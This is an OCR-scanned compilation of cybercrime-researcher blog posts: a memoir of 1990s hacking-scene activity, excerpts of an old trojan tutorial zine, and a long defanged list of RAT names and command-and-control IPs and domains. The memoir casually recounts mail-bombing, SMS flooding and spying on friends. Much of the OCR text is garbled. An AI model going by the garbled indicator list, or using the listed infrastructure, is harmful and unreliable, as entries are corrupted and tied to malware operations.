Mule Recruitment Scam Spotted in the Wild 

• [13]Historical OSINT - Re-Shipping Money Mule 
Recruitment "Your Shipping Panel LLC" Scam Domain 
Portfolio 


Spotted in the Wild 



• [14]The Threat Intelligence Market Segment - A Complete 
Mockery and IP Theft Compromise - An Open Letter 

to the U.S Intelligence Community 

• [15]Historical OSINT - A Portfolio of Fake Tech Support Scam 
Domains - An Analysis 

• [ 16]Historical OSINT - Georgian Justice Department and 
Georgia Ministry of Defense Compromised Serving Mal¬ 
ware Courtesy of the Kneber Botnet 

• [17]Historical OSINT - The Russian Business Network Says 

"Hi" 

• [18]Profiling "Innovative Marketing" - The Flagship 
Malvertising andf Scareware Distributor - Circa 2008 - An 

OSINT Analysis 

• [19]Exposing Evgeniy Mikhaylovich Bogachev and the 
"Jabber ZeuS" Gang - An OSINT Analysis 

• [20]Profiling a Currently Active Portfolio of High-Profile 
Cybercriminal Jabber and XMPP Accounts 

In this post I'll walk you though the story of my 
disappearance including a brief introduction and explanation 
of my 

"hacker enthusiast" years circa the 90's where I've been busy 
doing "lawful surveillance" and "lawful interception" 

throughout my teenage years while I was not busy working 
full-time with several H/C/P/A 



(Hacking/Cracking/Phreaking/Anarchy) groups as a full-time 
member practically setting up the foundations of the 

Threat Intelligence market segment a few years later 
including the basics of Technical Collection type of position 

including Independent Contractor working under NDA in a 
post 9/11 World including a personal greeting to 

everyone who's been approaching me and reaching out 
offering support and technical and operational "know-how" 

including general "say hi" advice. 
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I want to express a personal gratitude to a good old research 
friend - [2ljlnternet Anthropologist - who actually 

[22]initiated a track-down action and managed to 
indirectly find me circa 2010 with the help of international 
and 

Bulgarian law-enforcement including fellow colleagues and 
friends from the Security Industry and U.S Intelligence 

Community circa 2008-2013 who attempted to track me 
down and find out more about my disappearance. 

In this post I'll discuss my visit to the GCHQ circa 2008 with 
the Honeynet Project including an in-depth discussion on 

my "lawful interception" and "lawful surveillance" experience 
circa the 90's throughout my teenage hacker years including 
an in-depth discussion on the hacking Scene that I was proud 
to be a member of throughout the 90's 



having successfully participated in a variety of community 
and commercial projects including a personal thanks to 

the following friends and colleagues for offering support and 
keeping track of my research: 

• [23]Jamie Riden for making a personal contribution to my 
PayPal account for research purposes 

• [24]Steve Santorelli from Team Cymru forexpressing 
interest in a proprietary Threats Database 

• [25]Michal Salat for participating in a brief trial of my 
Threat Data service 

• [26]lan Cook for making a personal introduction to my 
current part-time employer [27]KCS Group Europe 

• [28]Jeffrey Bardin from Treadstone71 who reached out 
and offered employment opportunity 

• [29]Harrison Cook who's been persistently donating and 
reaching out to support the Offensive Warfare 2.0 

community 

• [30]John Young from Cryptome.org who helped spread 
the word about the Offensive Warfare 2.0 Community 

• [31]Liran Sorani from Webhose for the opportunity to 
participate in a part-time project 
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An In-depth Analysis of the Hacking Scene circa the 
90's through the prism of Dancho Danchev also 
known as tHe 

mAnlaC: 
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In a World where we've successfully set the foundation of 
offensive clandestine and psychological operations 

including the foundations of Technical Collection and the 
foundations of the [32]Threat Intelligence market 

segment including the persistent emphasis on cyber threats 
facing U.S Government and U.S National Infrastructure 

in the context of enriching and disseminating actionable 
Threat Intelligence on a variety of U.S Intelligence 

Community including academic partners throughout the past 
decade successfully leading me to participate in a Top 




Secret GCHQ Surveillance and Monitoring Program basically 
keeping track of hackers and security researchers on 

Twitter for proactive Cyber Defense and OSINT purposes 
called 11 [33]Lovely Horse" including a possible "4th Party 
Collection" trend-setting initiative circa 2008-2013 labeling 
some of my research as a possible "4th Party Collection" 

partner of U.S Intelligence Community including the 

[34]tracking and take down of the Koobface botnet 

including 

my experience as a Managing Director of "The Underground" 
also known as [35]Astalavista Security Group's 

Astalavista.com ([36]Security Interviews - Part 01; 
[37]Security Interviews - Part 02; [38]Security 
Interviews - Part 03) throughout 2003-2006 with my ex¬ 
girlfriend now partner in life - Yordanka llieva - when we used 
to rock the boat 

- and are prone to do so. Takes you back doesn't it? Keep 
reading. 

Personal Photo of bedroom hacker - today's leading 
expert in the field of cybercrime research security 
blogging 

and threat intelligence gathering - Dancho Danchev 
also known as the tHe mAnlaC circa the 90's with his 
hacker 

girlfriend - Yordanka llieva - including various 
personal projects circa the 90's 
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-={ Blackcode Ravers Magazine issue 2 }=- 
Home page : http://www.blackcode.com 
Editor of the magazine: tHe mAniAc 
themaniac@blackcode. com 


Table of contents: 


L.Editorial 

2. Mirrors of the magazine 

3. Latest News with Blackcode Ravers 
1.How to break your school security 
5.About virii 

5.Advertising 
7 .Trojans section 
B.For the newbies 
9.Linux section 
LO. Interviews 
LI.Final words 


L. Editori al 


Et's me again.This is our second issue.I've changed the 
design ana I've added several new things in the newsletter. 

I've also received a lot of e-mails about our magazine. 

3 eople like it and they want more information here. 

The first issue was short one but of course every new 
issue has many new things added in it. 

I'm happy people like it and we have MANY new subcribers every day. 
i\lso we nave much more visitors than before. 
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|The Complete Trojans Text j ........jwritten On[ 

j(Security Related) 

j by tMe MaNiAc j |I.04.2060 j 

|contact me at: thcmaniac$blackcode.com j -| ♦♦♦♦♦♦♦+♦♦ j 

|maniac£forbidden.net - security.org 


| ■*•*•*• | 

This guide is for educational purposes only I do not take any responsibility about anything 
happen after reading the guide. I'm only telling you how to do this not to do it. It's your decision. 

If you want to put this text on your Site/FTP/Newsgroup or anything else you can do it but don't 
change anything without the permission of the author.I'll be happy to see this text on other pages too. 

All copyrights reserved.You may destribute this text as long as it's not changed. 

Author Motes: 

I hope you like my texts and find then useful. 

If you have any problem or some suggestion feel free to e-mail me but please don't send mails like 
"I want to hack the US government please help me* or "Tell me how to blind a trojan into a .jpg* 

*l#1ere can I get a portscanner* etc. 

Be sure if I can help you with something I will do it. 

I've started writing security related tutorials and I hope you like that.I‘11 try to cover 
much more topics in my future texts and I want to thank to all of the people that like my 
texts. 

<••#—m--m—m—m—m—m—m> 

Links: 

.\ 

Mere you can find other texts \ 
written by me or other friends: \ 
http://www.blackcode.com / 

blacksun.box.sk / 

neworder.box.sk / 
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-l.What Is This Text About? 

•2.What Is A Trojan Horse 

-3.Trojans Today 

-4.The future of the trojans 

-S.Anti-Virus Scanners 

-6.How You Can Get Infected? 

.From ICQ 

.From IRC 

--From Attachment 

-From Physical Access 

-From Trick 

-7.How Dangerous A Trojan Can Be? 
•8.Different Kinds Of Trojans 
••••-Remote Access Trojans 

-Password Sending Trojans 

-Keyloggers 

•-Destructive Trojans 

•••••FTP Trojans 
-9.Who Can Infect You? 
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• I happen to have directly established a connection 
with one of the primary Sub7 Trojan Horse authors 
HeLL- 

fiReZ which makes me pretty close to [39]Steve Gibson in 
one way or another - throughout the 90's where 

we exchanged Trojan Horse samples while I was busy working 
for Trojan Defense Suite and the infamous Lock- 

down2000 anti-trojan software suite where I was busy 
working on signatures and help-guides compilation while 

I was also busy being a member of several hacking groups 
primarily found on the Cyberarmy.com Top 50 Hacking 



List including Progenic.com Top 100 hacking sites list. 


• Mail-bombing was a trend - in particular my personal 
experience of making jokes with friends who were unable 

to take care of 100+ email messages in their Inbox 

• Mass-Mailing List subscription - in particular the fact 
that my friends were not capable of finding a productive 

way to get rid of the messages and unsubscribe themselves 

• Telephony Denial of Service attack circa the 90 f s 

exploiting a popularfor Eastern Europe Mail2SMS mobile 

provider feature - in particular the fact that it's not 
necessarily a pleasant experience to get rid of 100+ SMS 

messages received in a short-period of time 

• "Lawful Interception" of friends - something else that 
I'm not particularly proud of is my "lawful surveillance" 

and "lawful interception" experience and capabilities of 
people that I knew and that I used to know largely 

driven by the need to explore and learn more 
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• Corporate Experience in the field of anti-trojan 
detection technologies and categorization - in 

particular my experience in creating trojan horse signatures 
and writing actual technical descriptions for the purpose of 
improving my employer's overall detection rate for a variety 
of trojan horse vendors circa the 90's. 



Do you remember my work from the 90's? Are you familiar 
with the Scene circa the 90's? Feel free to approach me - 

disruptive.individuals@gmail.com or make a PayPal donation 
using my PayPal ID: dancho.danchev@hush.com for 

the purpose of fueling growth into my research. 
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Massive Portfolio of APT (Advanced Persistent 
Threat) and RAT (Remote Access Tools) Domains 
Spotted 

in the Wild - An Analysis (2019-09-20 17:17) 

In a world dominated by thousands of currently active APT 
(Advanced Persistent Threat) campaigns also known as 

Remote Access Tools (RATs) including trojan horses it's worth 
pointing out that novice cybercriminals continue relying 

and actively utilizing a variety of commercial and publicly 
obtainable DIY (do-it-yourself) Remote Access Tools (RATs) 





















































for the purpose of committing cyber espionage and 
launching malicious and fraudulent cyber espionage themed 

campaigns targeting thousands of users including companies 
and nation-state actors. 

In this post I'll provide actionable intelligence on some of the 
most popular RAT (Remote Access Tools) cur¬ 
rently utilized for APT (Advanced Persistent Threat) type of 
nation-state sponsored and tolerated cyber espionage 

themed campaigns including an in-depth discussion on a 
massive domain portfolio of currently active C &C server 

IPs known to have participated in a variety of APT (Advanced 
Persistent Threat) type of cyber espionage campaigns 

throughout 2015-2019. 

Among the most popular APT (Advanced Persistent 
Threat) and Remote Access Tools (RATs) releases 
based 

on my public and proprietary sensor network remain 
the following currently obtainable commercial and 
publicly 

obtainable tools: 

• Casa RAT 

• Bandook RAT 

• Dark Comet Rat 
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Cerberus 


Cybergate 
Blackshades 
Poison Ivy 

Schwarze Sonne RAT 
Syndrome RAT 
Team Viewer 
Y3k RAT 
Snoopy 

5p00f3r.N $ RAT 

SpyNet 

P. Storrie RAT 

Turkojan Gold 

Bifrost 

Beast 

Shark 

Pain RAT 

xHacker Pro RAT 

Seed RAT 

Optix Pro RAT 




Dark Moon 


• NetDevil 

• Deeper RAT 

• MiniMo RAT 

• Alusinus RAT v0.8 

• Babylon 1.6.0.0 

• Bozok 1.4.3 

• BX RAT vl.O 

• Cloud Net RAT 

• Comet RAT v0.1.4 

• Coringa-RAT vO.l 
981 

• Crimson 3.0.0 

• Crimson RAT 2.2.6 

• ctOs 1.3.0.0 

• CyberGate vl.01.12 

• Dark Comet 5.3 

• DarkComet Legacy 

• DH Rat 0.3 


D-RAT 




Frutas RAT v0.9 


Greame RAT vl.9 
HAKOPS RAT v2 
Imminent Monitor 3.9.0.0 
Imperium RAT Cracked 
jRat 
jSpy 

jSpy RAT v0.09 
KilerRat V 10.0.0 
L6-RAT Beta 
Maus 2.0b 
Mega RAT 1.5 Beta 
MLRAT 
MQ5 RAT 
NanoCore 1.2.2.0 
NingaliNETvl.1.0.0 
NjRAT 0.7 

njRAT v0.8d By Nasser2012 
njworm 


NovaLite v3.0 




Nuclear RAT 2.1.0 


• Orion RAT 0.9 Free 

• Pandora RAT VI. 1 
982 

• Paradox RAT 

• Proton 1.1.0.6 

• pupy-master 

• Poison Ivy 

• Quasar 1.1 + Source 

• QuasarRAT vl.3.0.0 

• Rabbit-Hole Autoit RAT vl.O Beta 2 

• Revenge RAT vO.l 

• SkyWyder 2.2 

• Spycronic 1.02.1 

• Spygate 2.6 

• SpyGate-RAT 3.3 

• SpyNet 0.7 Public 

• Spy-Net v2.6 

• Turkojan 4.0 Gold 


ucuL vl.l 




Van tom RAT 


• Virus Rat v8.0 Beta 

• Xena Rat 2.0 

• xRAT 2.0 

Related domains and IPs known to have participated 
in various APT (Advanced Persistent Threat) and 
Remote 

Access Tools (RATs) type of malicious and fraudulent 
campaigns throughout 2015-2019: 

hxxp://009boot.ddns.net/ 

hxxp://104.144.198.115/ 

hxxp://105.105.104.198/ 

hxxp://105.105.173.58/ 

hxxp 7/105.105.185.105/ 

hxxp 7/109.201.189.13/ 

hxxp 7/111.2 21.29.2 54/ 

hxxp 7/115.12 6.219.31/ 

hxxp 7/118.2 6.141.209/ 

hxxp 7/118.2 6.141.210/ 

hxxp 7/12 2.46.15.164/ 

hxxp 7/12 3unkl23.ddns.net/ 



hxxp://13.124.168.74/ 
hxxp ://130.2 5.2 42.66/ 
hxxp 7/133 katelinn.hopto.org/ 
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hxxp 7/138.130.206.150/ 
hxxp 7/139.162.17 5.167/ 
hxxp 7/141.2 55.159.3/ 
hxxp 7/149.129.133.195/ 
hxxp 7/149.3.143.104/ 
hxxp 7/151.101.2.110/ 
hxxp 7/160.202.163.243/ 
hxxp 7/167.108.52.154/ 
hxxp 7/167.116.2 2.242/ 
hxxp 7/167.116.32.152/ 
hxxp 7/167.116.48.151/ 
hxxp 7/167.99.2 51.51/ 
hxxp 7/17 7.130.49.118/ 
hxxp 7/178.54.139.105/ 
hxxp 7/179.12 5.62.162/ 
hxxp 7/179.2 21.42.45/ 



hxxp ://18.218.2 2 8.13 2/ 
hxxp 7/180.68.114.205/ 
hxxp 7/181.214.55.23/ 
hxxp 7/181.46.172.191/ 
hxxp 7/181.52.105.187/ 
hxxp 7/185.12 5.205.81/ 
hxxp 7/185.12 5.205.91/ 
hxxp 7/185.148.241.58/ 
hxxp 7/185.208.211.2 35/ 
hxxp 7/185.2 09.85.74/ 
hxxp 7/185.2 54.183.115/ 
hxxp 7/185.31.161.186/ 
hxxp7/185.56.90.77/ 
hxxp 7/185.81.157.24/ 
hxxp 7/185.82.216.57/ 
hxxp 7/185.84.181.89/ 
hxxp 7/186.118.110.209/ 
hxxp 7/186.118.111.142/ 
hxxp 7/188.165.2 24.2 6/ 
hxxp 7/188.2.13 7.168/ 



hxxp://188.54.182.240/ 
hxxp ://188.54.184.3 6/ 
hxxp7/188.66.7.124/ 
hxxp 7/188.72.104.64/ 
hxxp 7/188.83.129.33/ 
hxxp 7/189.47.113.180/ 
hxxp7/189.47.114.215/ 
hxxp 7/191.101.2 2.196/ 
hxxp 7/192.169.69.2 5/ 
hxxp 7/194.182.7 3.17 3/ 
hxxp 7/194.5.98.56/ 
hxxp 7/197.2 07.219.2 06/ 
hxxp7/2.20.242.8/ 
hxxp 7/2.21.242.2 3 7/ 
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hxxp 7/2 01.208.105.81/ 
hxxp 7/2 02.195.210.218/ 
hxxp 7/2 04.44.7 8.113/ 
hxxp 7/211.108.133.241/ 
hxxp 7/211.44.166.16/ 



hxxp ://212.12 9.42.2 06/ 
hxxp 7/212.133.210.2 32/ 
hxxp 7/212.47.247.76/ 
hxxp 7/212.7.208.105/ 
hxxp 7/212.83.170.126/ 
hxxp 7/213.183.58.39/ 
hxxp 7/213.208.129.200/ 
hxxp 7/217.103.124.136/ 
hxxp 7/218.2 04.141.2 2 8/ 
hxxp 7/2 2 0.124.2 3.84/ 
hxxp 7/2 3.105.131.162/ 
hxxp 7/2 5.6 6.198.7 7/ 
hxxp 7/34.211.181.161/ 
hxxp7/35.176.10.40/ 
hxxp 7/3 7.104.186.158/ 
hxxp7/37.115.47.107/ 
hxxp 7/41.101.5.34/ 
hxxp 7/41.102.2 35.191/ 
hxxp 7/41.58.69.217/ 
hxxp7/41.58.96.58/ 



hxxp ://43.254.134.15 7/ 
hxxp7/45.76.87.6/ 
hxxp 7/46.164.167.42/ 
hxxp 7/46.246.5.130/ 
hxxp7/46.246.85.131/ 
hxxp 7/5.101.170.159/ 
hxxp7/5.187.49.231/ 
hxxp 7/5.188.2 31.2 35/ 
hxxp 7/5.34.183.64/ 
hxxp 7/5 2.138.216.83/ 
hxxp 7/5 2.87.114.116/ 
hxxp7/56d8ala6.hopto.org/ 
hxxp7/60.10.0.13/ 
hxxp7/62.235.139.42/ 
hxxp 7/6 3.2 3 7.5 7.2 2 2/ 
hxxp 7/6 5.184.2 5.147/ 
hxxp 7/66fmicro. duckdns.org/ 
hxxp 7/68.5 3.163.100/ 
hxxp 7/6alexander9.ddns.net/ 
hxxp 7/7 6.7 3.114.50/ 



hxxp ://77.139.164.191/ 
hxxpV/77.48.28.227/ 
hxxp 7/7 8.12.174.15 7/ 
hxxp 7/7 8.12.17 7.3 2/ 
hxxp 7/78.130.176.162/ 
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hxxp 7/7 9.134.2 2 5.116/ 
hxxp7/81.231.10.43/ 
hxxp7/81.61.79.44/ 
hxxp 7/84.151.157.38/ 
hxxp7/85.110.45.5/ 
hxxp 7/87.11.97.192/ 
hxxp 7/89.134.165.187/ 
hxxp 7/90.96.103.2 03/ 
hxxp7/92.122.53.40/ 
hxxp 7/92.2 2 2.112.70/ 
hxxp7/94.183.210.219/ 
hxxp 7/94.2 37.2 8.110/ 
hxxp 7/95.100.2 52.51/ 
hxxp 7/95.154.199.21/ 



hxxp://a5la8y 1201.ddns.net/ 
hxxp://aal23.zapto.org/ 
hxxp://aaaa5. hopto.org/ 
hxxp://abdodz.ddns.net/ 
hxxp://abdou 12 34.hopto.org/ 
hxxp://abdulla244.myftp.biz/ 
hxxp://abidas2018.ddns.net/ 
hxxp://abo6na. no-ip.org/ 
hxxp://abri I paradon.duckdns.org/ 
hxxp://adidas2018.ddns.net/ 
hxxp://ad itrix.ddns.net/ 
hxxp ://ad mi nirq. no-ip. biz/ 
hxxp://adsfca.duckdns.org/ 
hxxp://agbero.duckd ns.org/ 
hxxp://ahlanc500.zapto.org/ 
hxxp ://a hmad025.ddns.net/ 
hxxp ://a hmed461.ddns.net/ 
hxxp ://a hmedhero2020.zapto.org/ 
hxxp ://a hmedmhmed4711.ddns.net/ 
hxxp ://a hmedstarl23.ddns.net/ 



hxxp://a hmetabis.duckdns.org/ 
hxxp://a kramhbcl.ddns.net/ 
hxxp://alaal70.hopto.org/ 
hxxp ://a Id i wan i. no-ip. biz/ 
hxxp://a lemania.duckdns.org/ 
hxxp ://a Iger07.ddns.net/ 
hxxp://ali 11.sytes.net/ 
hxxp ://a I il23.ddns.net/ 
hxxp://alicemedrado.no-ip.org/ 
hxxp://alihacker2018.no-ip.biz/ 
hxxp://alihazm2017.no-ip.biz/ 
hxxp ://a I iking 12 3.ddns.net/ 
hxxp ://a I isami.hopto.org/ 
hxxp ://a I kal.publicvm.com/ 
hxxp ://a I ml k.ddns.net/ 
hxxp://alone.sytes.net/ 
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hxxp://alsha2e.zapto.org/ 
hxxp ://a m2 2 am.ddns.net/ 
hxxp ://a manal.duckdns.org/ 



hxxp://a mbush.ddns.net/ 
hxxp://a merkadl9.ddns.net/ 
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hxxp://top2.alqaysarpizza.xyz/ 
hxxp://topwi ko.ddns.net/ 
hxxp://tossonat.ddns.net/ 
hxxp://total-vi rus.myq-see.com/ 
hxxp://trabal hoaaa.ddns.net/ 
hxxp://trasatl is.sytes.net/ 
hxxp://tsdn.l inkpc.net/ 
hxxp://ttmg laz.ddns.net/ 
hxxp://tu re-free.ddns.net/ 
hxxp://turl ututu.zapto.org/ 
hxxp://tutobaixei.ddns.net/ 
hxxp://u nificaequatorial.ddns.net/ 



hxxp://u nknown277.ddns.net/ 
hxxp://u pdatefacebook.serveblog.net/ 
hxxp://vam2 2.ddns.net/ 
hxxp://vantomratl 133.ddns.net/ 
hxxp://vendeto.hopto.org/ 
hxxp://vice. hopto.org/ 

996 

hxxp://videntets3.ddns.net/ 
hxxp://viewi. publicvm.com/ 
hxxp://vi kvik.duckdns.org/ 
hxxp://warda73. no-ip. biz/ 
hxxp://wazy 1010.ddns.net/ 
hxxp://webconn.ddns.net/ 
hxxp://wecol lect.duckdns.org/ 
hxxp://werty uio.ddns.net/ 
hxxp://westshark.ddns.net/ 
hxxp://wi indows.myvnc.com/ 
hxxp://wi ndown7service.ddns.net/ 
hxxp://wi ndowslogon.ddns.net/ 
hxxp://wi ndowsuport.duckdns.org/ 



hxxp://wi nkwink.duckdns.org/ 
hxxp://wi nserver.zapto.org/ 
hxxp://woocu rn.blogsyte.com/ 
hxxp://wsoo.ddns.net/ 
hxxp://wtfwindows.myftp.biz/ 
hxxp://wy meserver777.ddns.net/ 
hxxp://xaker555.no-ip.org/ 
hxxp://xfxf.ddns.net/ 
hxxp://xnxx44.ddns.net/ 
hxxp://xpzn rt2.ddns.net/ 
hxxp://xsa ral2.dnnq.net/ 
hxxp://xtrmmarzonu evo.duckdns.org/ 
hxxp://xtyoservices.ddns.net/ 
hxxp://y9. ddns.net/ 
hxxp://yasi rcf.hopto.org/ 
hxxp ://yazhagal4246.ddns.net/ 
hxxp://yojen0120.myddns.me/ 
hxxp ://youfu eked now.ddns.net/ 
hxxp://you nessp.ddns.net/ 
hxxp ://youssefel mi.ddns.net/ 



hxxp://youtu bersxd.ddns.net/ 
hxxp://yu rmaufat.ddns.net/ 
hxxp://z8gamescf.ddns.net/ 
hxxp://zayd506. ddns.net/ 
hxxp://zebi rcp.duckdns.org/ 
hxxp://zef. bounceme.net/ 
hxxp://zekorap623.ddns.net/ 
hxxp://zerokart.kro.kr/ 
hxxp://zi kokoko.ddns.net/ 
hxxp://zktha bani.hopto.org/ 
hxxp://zoh irsenia.ddns.net/ 
hxxp://zu eirasemlimites.duckdns.org/ 
hxxp://zzxxcc2018. hopto.org/ 
hxxp ://103.21.117.143/ 
hxxp 7/103.38.2 52.63/ 
hxxp 7/103.40.163.55/ 
hxxp 7/103.44.145.245/ 
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hxxp7/104.238.176.9/ 
hxxp 7/105.101.151.77/ 



hxxp://105.108.35.56/ 

hxxp ://105.199.18.240/ 

hxxp 7/106.51.163.2 32/ 

hxxp 7/108.61.211.219/ 

hxxp 7/109.2 2 5.178.41/ 

hxxp 7/109.2 36.94.121/ 

hxxp7/109.73.68.114/ 

hxxp 7/111.7 2.167.12 7/ 

hxxp 7/115.159.125.47/ 

hxxp 7/115.28.173.37/ 

hxxp 7/117.32.216.117/ 

hxxp 7/120.2 5.150.91/ 

hxxp 7/121.147.18.158/ 

hxxp 7/12 3.2 07.2 3 2.79/ 

hxxp 7/12 345678912 3456789. myftp. biz/ 

hxxp 7/13.65.194.5/ 

hxxp7/l 337ace.ddns.net/ 

hxxp 7/134987479 l.gnway.cc/ 

hxxp7/137.0.0.1/ 

hxxp 7/138.12 2.118.154/ 



hxxp://139.199.187.28/ 
hxxp://14.222.182.50/ 
hxxp ://141.2 5 5.144.7 2/ 
hxxp 7/141.2 55.148.161/ 
hxxp 7/141.2 55.150.159/ 
hxxp 7/141.2 5 5.159.49/ 
hxxp 7/144.48.2 42.2 21/ 
hxxp7/1488.sytes.net/ 
hxxp 7/151.246.2 30.21/ 
hxxp 7/151.247.143.12 5/ 
hxxp 7/151.248.12 6.183/ 
hxxp 7/151.72.17.61/ 
hxxp 7/156.206.211.12/ 
hxxp7/l 59asd.duckdns.org/ 
hxxp 7/17 6.42.111.248/ 
hxxp7/177mu.cn/ 
hxxp 7/178.74.111.106/ 
hxxp 7/181.143.118.164/ 
hxxp7/183.82.99.133/ 
hxxp 7/185.32.2 21.2 3/ 



hxxp://185.82.220.152/ 
hxxp ://186.84.216.126/ 
hxxp 7/187.180.186.181/ 
hxxp7/188.166.76.144/ 
hxxp 7/188.215.131.47/ 
hxxp 7/188.24.119.27/ 
hxxp 7/188.3.13.98/ 
hxxp 7/189.174.12 5.60/ 
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hxxp 7/190.240.24.2/ 
hxxp7/192.137.0.15/ 
hxxp 7/192.248.32.193/ 
hxxp7/192.92.42.25/ 
hxxp 7/197.2.81.35/ 
hxxp 7/197.3 5.134.69/ 
hxxp 7/197.48.183.7 2/ 
hxxp 7/198.144.106.135/ 
hxxp 7/1987omid.ddns.net/ 
hxxp 7/lfonl.ddns.net/ 
hxxp7/lm4962f897.iok.la/ 



hxxp://2.191.186.145/ 
hxxp://2.236.40.82/ 
hxxp://2.25.171.244/ 
hxxp://201.156.140.218/ 
hxxp ://201.15 7.144.5 3/ 
hxxp 7/2 03.189.2 3 2.2 3 7/ 
hxxp 7/211.162.52.205/ 
hxxp 7/213.136.83.173/ 
hxxp7/213.183.58.40/ 
hxxp 7/213.244.123.94/ 
hxxp7/219.235.0.93/ 
hxxp 7/2 21345 20.ddns.net/ 
hxxp 7/2 2 2.168.1.2/ 
hxxp 7/2 2 2.79.2 2 7.93/ 
hxxp 7/2 7.198.135.116/ 
hxxp 7/2 71572 9.vicp.net/ 
hxxp 7/31.146.2 02.169/ 
hxxp 7/31.210.117.132/ 
hxxp 7/34.2 08.211.52/ 
hxxp 7/3 5.161.2 38.10/ 



hxxp://37.114.212.119/ 
hxxp ://37.115.170.240/ 
hxxp7/37.152.166.4/ 
hxxp7/37.16.139.86/ 
hxxp 7/3 7.2 39.8.89/ 
hxxp 7/3 7.2 54.193.17 2/ 
hxxp 7/39.43.2 31.2 28/ 
hxxp 7/41.2 2 6.168.63/ 
hxxp7/41.38.56.81/ 
hxxp 7/45.12 6.124.15 5/ 
hxxp 7/46.150.2 52.2 35/ 
hxxp 7/46.166.134.149/ 
hxxp 7/46.4.2 5 5.98/ 
hxxp 7/5.13 5.12 7.183/ 
hxxp 7/5.189.13 7.186/ 
hxxp 7/5.2 2 2.66.57/ 
hxxp7/5.222.70.95/ 
hxxp 7/5.2 34.240.2 7/ 
hxxp7/5.237.98.77/ 
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hxxp://5107b712.alll23.net/ 
hxxp://52.193.97.24/ 
hxxp://5701cl96.12 3nat.com/ 
hxxp://58.213.154.197/ 
hxxp ://61.153.104.113/ 
hxxp 7/6 6.7 0.198.2 43/ 
hxxp7/6gh.noip.me/ 
hxxp 7/7 2 662 7.duckdns.org/ 
hxxp7/77.171.37.46/ 
hxxp 7/7 7.81.19 7.144/ 
hxxp 7/7 9.13 7.2 2 3.139/ 
hxxp 7/79.153.5 2.2 35/ 
hxxp7/79649759.ddns.net/ 
hxxp7/7daysky. in.3322.org/ 
hxxp 7/80.136.103.51/ 
hxxp 7/80.59.208.2 37/ 
hxxp7/80.82.65.85/ 
hxxp 7/84.241.6.106/ 
hxxp 7/85.107.115.16/ 
hxxp 7/88.150.149.91/ 



hxxp://88.228.83.160/ 
hxxp ://90.16.2 06.2 07/ 
hxxp7/91.109.22.5/ 
hxxp 7/93.104.213.217/ 
hxxp 7/9 3.169.2 47.218/ 
hxxp 7/94.212.118.115/ 
hxxp 7/9 5.17 3.2 40.117/ 
hxxp7/96750513.ddns.net/ 
hxxp7/9949291099. hopto.org/ 
hxxp 7/a. tomx.xyz/ 
hxxp7/a lb2c3.hopto.org/ 
hxxp7/aagaro.ddns.net/ 
hxxp7/aasxzxdscl2324.no-ip.biz/ 
hxxp7/abarouter.ddns.net/ 
hxxp7/abbaass313. hopto.org/ 
hxxp7/abbaass3132.hopto.org/ 
hxxp7/abcccabccab.ddns.net/ 
hxxp 7/a bderrahmanel6.hopto.org/ 
hxxp7/abdo099.ddns.net/ 
hxxp7/abdobacha05.ddns.net/ 



hxxp://abdou 16.hopto.org/ 
hxxp://a bdouoahmed.ddns.net/ 
hxxp://abduls0821.myddns.me/ 
hxxp://a binova.ddns.net/ 
hxxp://abosaoys881.duia.us/ 
hxxp://a bs3nt.ddns.net/ 
hxxp://achrafzou ina.zapto.org/ 
hxxp://ad 15.hopto.org/ 
hxxp://adelxxbx. no-ip. biz/ 
hxxp://adesjal 337. no-ip. biz/ 
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hxxp://ad I in.duckdns.org/ 
hxxp://adobflash. hopto.org/ 
hxxp://aerror.no-ip.biz/ 
hxxp://ahag3ld 1.ddns.net/ 
hxxp://a hmdiand-wj3.ddns.net/ 
hxxp://ahmed 12345.hoptp.org/ 
hxxp://a hmed2012.dynu.com/ 
hxxp://ahmed90011912.ddns.net/ 
hxxp://a hmedmidoegypt.hopto.org/ 



hxxp://a homdalhomd42.hopto.org/ 
hxxp://ala6a. no-ip.biz/ 
hxxp://alaajb.zapto.org/ 
hxxp://alaauy.ddns.net/ 
hxxp://alabamal92837. no-ip.org/ 
hxxp://alanbkey.no-ip.org/ 
hxxp://alarr2012ab.myftp.biz/ 
hxxp://a I bash2222.ddns.net/ 
hxxp://ali2627. ddns.net/ 
hxxp://a I i7070.ddns.net/ 
hxxp://ali boxboxbox.hopto.org/ 
hxxp://a Ikingahmed555.ddns.net/ 
hxxp://al ldebrid.duckdns.org/ 
hxxp://a I lforfree.game-host.org/ 
hxxp://al pheron.duckdns.org/ 
hxxp://a lzintani.ddns.net/ 
hxxp://amarok58. no-ip. biz/ 
hxxp://a melwafaw.ddns.net/ 
hxxp://ami namadanil6.hopto.org/ 
hxxp://a mi nbatna31.ddns.net/ 



hxxp://a mi necity.ddns.net/ 
hxxp://a mi nrahimzadeh.no-ip.org/ 
hxxp://a mi raliam.ddns.net/ 
hxxp://a mi rhosein0074.ddns.net/ 
hxxp://a mmaar938.ddns.net/ 
hxxp://ampala.ddns.net/ 
hxxp://amran-pc. no-ip. biz/ 
hxxp://a mrozamrozamroz.hopto.org/ 
hxxp://a mrsamy222.ddns.net/ 
hxxp://amsdj.hopto.org/ 
hxxp://an.droidsuper.su/ 
hxxp://a nawebs.ddns.net/ 
hxxp://andr01d.zapto.org/ 
hxxp://a ndrew999.ipnodns.ru/ 
hxxp://a ndriod91.ddns.net/ 
hxxp://androO 161. no-ip. info/ 
hxxp://a ndrol23.duckdns.org/ 
hxxp://androd uck.duckdns.org/ 
hxxp://android. no-ip.org/ 
hxxp://a ndroidl385.ddns.net/ 



hxxp://a ndroidalbums.ddns.net/ 
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hxxp://a ndroidan.ddns.net/ 
hxxp://androidbra.duckdns.org/ 
hxxp://a ndroidfdl.ddns.net/ 
hxxp://a ndroidrat21.ddns.net/ 
hxxp://a ndroidsafe.ddns.net/ 
hxxp://a ndroidtestO.ddns.net/ 
hxxp://a ndroidtool.ddns.net/ 
hxxp://androidupdate.ddns.net/ 
hxxp://a ndrojak.myftp.org/ 
hxxp://a ndroratl226.ddns.net/ 
hxxp://a ndrorat22.ddns.net/ 
hxxp://androratbtas. no-ip. info/ 
hxxp://a ndroratvirgin.duckdns.org/ 
hxxp://andverl8. no-ip. biz/ 
hxxp://a nishmishra66.ddns.net/ 
hxxp://a nito.ddns.net/ 
hxxp://a non008.ddns.net/ 
hxxp://a nondz97.ddns.net/ 



hxxp://a non imousdrel80.ddns.net/ 
hxxp://a nonvirus.ddns.net/ 
hxxp://a nonymo9s.ddns.net/ 
hxxp://a pkhamza.ddns.net/ 
hxxp://a pplecenikosmos.hldns.ru/ 
hxxp://appsystem.ddns.net/ 
hxxp://aqwkdol.no-ip. biz/ 
hxxp://ari aaalikazm.ddns.net/ 



